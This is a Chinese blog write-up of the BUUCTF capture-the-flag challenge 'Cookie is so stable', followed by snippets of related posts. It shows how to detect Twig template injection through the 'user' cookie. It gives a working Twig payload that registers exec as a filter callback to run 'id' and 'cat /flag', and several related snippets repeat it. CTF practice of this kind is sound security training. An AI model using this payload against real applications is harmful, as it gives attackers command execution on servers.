Buuctf(Cookie is so stable )

最新推荐文章于 2024-07-25 09:58:57 发布
最新推荐文章于 2024-07-25 09:58:57 发布
阅读量424 收藏 1
点赞数
分类专栏: BuuCTF 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64444909/article/details/124132750
版权

1.本题需要了解到服务端模板注入攻击,SSTI里的Twig攻击。
在这里插入图片描述这里大家要想详细了解可以查看这里的两篇博客
智慧门
安全门
测试为Twig还是jinja2模块的方法:
输入{{7*‘7’}},返回49表示是 Twig 模块
输入{{7*‘7’}},返回7777777表示是 Jinja2 模块
2.尝试输入以后发现本题为Twig模块
在这里插入图片描述3.Twig模块的payload自己记录下来,下次需要直接复制即可
PS: 先要把exec() 作为回调函数传进去就能实现命令执行了
(1)首先要先查看id,用BP抓包放包即可在网页直接查看回显

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

在这里插入图片描述(2)在源码中我们发现了有flag的提示,接下来将将"cat /flag" 替换"id" 即可在网页回显出flag,这里因为环境不一样,flag也会改变,就不放flag了,相信大家都可以解决

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述
4.本题需要注意,做题的时候要学会把题目每一个页面的源码都查看一遍,我们不难发现在hint页面,提示我们看cookie
这也是为什么本题许多小伙伴做不出来的原因。这题很特别,我们随便转一个username,都会回显你的username,我们一开始以为username就是它的注入点,但是按F12查看cookie时却发现它的注入点叫user。所以我们要特别小心,抓包得到的注入点应该是user。
在这里插入图片描述

5.做题时,先按F12查看cookie,再去抓包,显示的就是user
在这里插入图片描述

小小大空翼
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
获取cookie非常好用的google插件
06-10
标题中的“获取cookie非常好用的google插件”指的是在Google Chrome浏览器上的一种扩展程序,它允许用户方便地管理和操作浏览器中的Cookie数据。Cookie是网站在用户计算机上存储的小型文本文件,用于跟踪用户偏好、...
EditThisCookie1.6.3.crx
02-14
方式1. 直接安装EditThisCookie1.6.3.crx设置浏览器cookie; !! 如果1.方式不好用使用方式2 方式2.解压zip文件->chrome选择开发者模式->加载已解压的压缩程序->选择对应的压缩文件目录
buuctf-Cookie is so stable
m0_62094846的博客
11-21 138
打开后页面有两个可以点 输入23就会显示23,应该是注入 但和 平常的注入不太一样 wp上是说ssti 漏洞 按照图中的试试看 确定是Twig注入 查找模板 在登陆的状态下抓包,user后面是注入点 这是模板,但是输入后并没用 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 把id换成cat /flag ...
BUUCTF [BJDCTF2020] Cookie is so stable
Senimo
01-03 443
BUUCTF [BJDCTF2020] Cookie is so stable 考点: Twig模版注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} 首先启动环境: 其中导航栏包括Flag和Hint页面,依次点击查看,首先是Hint页面: 查看网页源码,得到: <h3>Welcome to BJDCTF 2020.Happy Game!</h3>
[BJDCTF2020]Cookie is so stable1
m0_73673698的博客
06-13 341
如果是Jinja2的话输出应该是输出22,为什么输出22呢,'2'在python中被看作是字符串,在python中一个字符串乘上一个数字,就是将这个字符串连续输出,看下面演示。这里是Twig1.x版本(但是怎么确定是1.x版本的我没有弄明白,因此下面的payload也只适用于Twig1.x版本)最终我们的payload为。提示看一下cookie,我们在flag.php页面抓包可以看到cookie中是存在一个user参数的。确定是ssti注入,那么接下来就是确定是哪个模板了,上图。打开题目,看到如下页面。
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解)
小宇的web博客
02-18 2522
buuctf-[BJDCTF2020]Cookie is so stable(小宇特详解) 先看一下题目 有首页,有flag页面,有Hint页面 这里题目有提示,突破口是在cookie上面 这里先进行抓包分析 这里的知识点是利用服务端模板注入攻击。SSTI里面的Twig攻击 这里有判断模板注入类型的办法 输入{{7*‘7’}},返回49表示是 Twig 模块 输入{{7*‘7’}},返回7777777表示是 Jinja2 模块 这里在cookie处进行判断 user={{7*‘7’}},查看返回值
BUUCTF [BJDCTF2020]Cookie is so stable
Chu_Jian_Xiong的博客
10-10 177
[BJDCTF2020]Cookie is so stable模板注入Payload获取flag 模板注入 打开题目 直奔主题吧 发现回显和输入是一样的,猜想是模板注入 这里引入个模板注入流程图 经过测试可以发现该模板应该是Twig,直接去拿对应的Payload Payload {{_self.env.registerUndefinedFilterCallback("exec")}{{_self.env.getFilter("id")}} 获取flag 用burp做 查看根目录发现只给一个条
BUUCTF:[BJDCTF2020]Cookie is so stable
qq_46230755的博客
12-27 275
打开后发现有一个flag选项卡,进去后发现有一个输入框 简单测试一下 发现存在着模板注入 (别的师傅那copy的流程图) 如果是Twig,输入{{7*'7'}} 输出49 如果是Jinja,输入{{7*'7'}} 输出7777777 这题是Twig 在hint.php的源码中,对我们进行了提示 我们进行抓包,然后发现cookie里的user是注入点,直接构造payload user={{_self.env.registerUndefinedFilterCallback("exec")}}{.
BUUCTF】[BJDCTF2020]Cookie is so stable
aoao331198的博客
04-30 230
flag页面比较容易看出来存在SSTI 看见有wp说是Twig模板注入,copy一下判断方法 尝试{{7*7}}, 返回49 尝试{{7*‘7’}},返回49,说明是Twig模板,但是如果返回7777777,则说明是Jinia2模板 不同的模板的攻击方式不同,贴一个好文章 一篇文章带你理解漏洞之 SSTI 漏洞 用PL {{_self.env.registerUndefinedFilterCallback("exec")}} {{_self.env.getFilter("id")}} 但是在输入框.
web buuctf [BJDCTF2020]Cookie is so stable
weixin_44214568的博客
03-31 514
1. 2.查看hint页面源代码,提示关键在cookie 3.用admin登录,之后刷新抓包,发现cookie: UM_distinctid=17df970999f4d4-04704e6be3f571-4c3e207f-e1000-17df97099a05d4; PHPSESSID=c8ca1d92349dffef8879d35029b3eeb0; user=admin 第一个是友盟的,主要看cookie中的user 4.cookie中的注入,我第一个想法就是ssti(模板注入) paylo
[BJDCTF2020]Cookie is so stable
Sk1y的博客
04-05 1705
考查的地方:模板注入,利用Twig模板本身的特性进行攻击
BUUCTF-web类-[BJDCTF2020]Cookie is so stable
weixin_44622228的博客
04-20 864
BUUCTF-web类-[BJDCTF2020]Cookie is so stable 题目提示Cookie,进入靶机就看看cookie, 目前看来没有什么异常,先看看页面,发现有flag按钮,查看一下 要我们输入一个id,随便输入个123看看, 回显我们的id,于是看了看我的cookie,发现Cookie中多了user参数。 初步猜想,有没有可能是Cookie注入?于是我输入了几个注入关键字测试...
cookie实现自动登入
10-10
在互联网应用中,实现用户自动登录功能通常会利用Cookie这一技术。Cookie是由服务器发送到用户的浏览器并存储在本地的一小块数据,它包含了用户的一些关键信息,如用户名、登录状态等,以便下次用户访问时,服务器能...
httpwebreqeust读取httponly的cookie方法
08-31
Web开发中,Cookie是服务器发送到客户端浏览器并存储的一小块数据,用于跟踪用户状态和存储相关信息。然而,有些Cookie被标记为`HttpOnly`,这意味着它们不能通过JavaScript等客户端脚本语言访问,以增加安全性,...
通过cookie记住密码-HTML
12-06
在网页开发中,"通过cookie记住密码"是一个常见的功能,它允许用户在访问网站时无需每次都手动输入登录凭据。这个功能的实现涉及到HTML、JavaScript(JS)以及服务器端的技术,如HTTP Cookie。下面我们将详细探讨这...
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 725
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1047
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
qt练习控件label控件-lineEdit控件样例代码
最新发布
07-30
qt练习控件label控件-lineEdit控件样例代码
buu ctf web进阶]ssti
08-23
buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵,用户数据泄露等安全问题。在比赛中,参赛者需要学习ssti的原理和常见的攻击方法,并利用它来获取目标系统的flag。在比赛中,常见的ctf题目会提供一些模板注入的挑战,参赛者需要在给定的条件下,构造合适的payload来实现攻击目标。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(wp)ctfweb-buu中ssti模板注入](https://blog.csdn.net/qq_51862722/article/details/118685275)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值